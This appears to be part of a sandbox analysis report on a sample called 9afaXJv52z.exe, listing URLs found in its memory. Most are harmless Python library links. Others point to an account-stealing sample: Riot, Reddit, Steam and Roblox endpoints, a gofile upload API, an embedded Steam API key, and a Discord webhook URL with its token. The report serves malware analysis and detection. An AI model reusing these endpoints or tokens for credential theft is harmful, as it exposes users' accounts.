Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: 9afaXJv52z.exe, 00000002.00000003.1549904859.0000020DAD92B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DAD8B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549821357.0000020DAD924000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1569662370.0000020DAD999000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550963678.0000020DAD991000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557993230.0000020DAD997000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://python.org/
Source: 9afaXJv52z.exe, 00000002.00000003.1261155792.0000020DADA11000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD8AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 9afaXJv52z.exe, 00000002.00000003.1562825975.0000020DADA5E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549460513.0000020DAD9CF000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DADA56000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551519876.0000020DADA25000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1570067945.0000020DADA5F000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551014490.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1562091332.0000020DADA28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: 9afaXJv52z.exe, 00000002.00000003.1261155792.0000020DADA11000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1262454309.0000020DAD8CF000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261382928.0000020DAD8D8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD8AD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1262711651.0000020DAD8DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: 9afaXJv52z.exe, 00000002.00000003.1261155792.0000020DADA11000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD8AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.riotgames.com/api/account/v1/user
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.reddit.com/api/access_token
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
Source: 9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue37179
Source: 9afaXJv52z.exe, 00000002.00000003.1552343432.0000020DAD769000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261327304.0000020DAD769000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549171884.0000020DAD701000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551387994.0000020DAD766000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1259331986.0000020DAD990000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1568839015.0000020DAD76A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551325129.0000020DAD758000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1260666235.0000020DAD769000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1259547789.0000020DAD990000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1262607699.0000020DAD762000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1259614241.0000020DAD769000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1263149151.0000020DAD766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue42195.
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://cryptography.io
Source: METADATA0.0.dr	String found in binary or memory: https://cryptography.io/
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://cryptography.io/en/latest/changelog/
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://cryptography.io/en/latest/security/
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v8/users/
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvD
Source: 9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
Source: 9afaXJv52z.exe, 00000002.00000003.1549904859.0000020DAD92B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DAD8B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549821357.0000020DAD924000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1561481044.0000020DAD994000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550963678.0000020DAD991000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADE66000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1555260305.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1570923303.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://economy.roblox.com/v1/users/
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://filepreviews.io/
Source: edb.log.61.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000003D.00000003.1380403426.000001B6AE040000.00000004.00000800.00020000.00000000.sdmp, edb.log.61.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: 9afaXJv52z.exe, 00000002.00000003.1559277843.0000020DAB99B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1565010264.0000020DAB9B8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258719819.0000020DAB9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1552282326.0000020DAB99A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1257221376.0000020DAD671000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1560322724.0000020DAB9B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550721004.0000020DAB98A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: 9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/microsoft/pyright/)).
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://github.com/pyca/cryptography
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://github.com/pyca/cryptography/
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
Source: METADATA0.0.dr	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs)
Source: 9afaXJv52z.exe, 00000000.00000003.1246713889.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246388423.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246295929.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1068)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1079)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1081)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1084)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1085)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1090)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1092)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1099)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1105)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1107)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1117)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1120)
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/1122)
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADE66000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1555260305.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1571019109.0000020DADE86000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1558309573.0000020DADE85000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python-attrs/attrs/issues/136
Source: 9afaXJv52z.exe, 00000002.00000003.1549123706.0000020DADF16000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADEF6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1571242400.0000020DADF18000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADEF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python-attrs/attrs/issues/251
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADE66000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1555260305.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1571019109.0000020DADE86000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1558309573.0000020DADE85000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python-attrs/attrs/issues/428
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/issues/993)
Source: 9afaXJv52z.exe, 00000000.00000003.1246713889.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246388423.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246295929.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
Source: 9afaXJv52z.exe, 00000002.00000002.1565167633.0000020DAD2B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
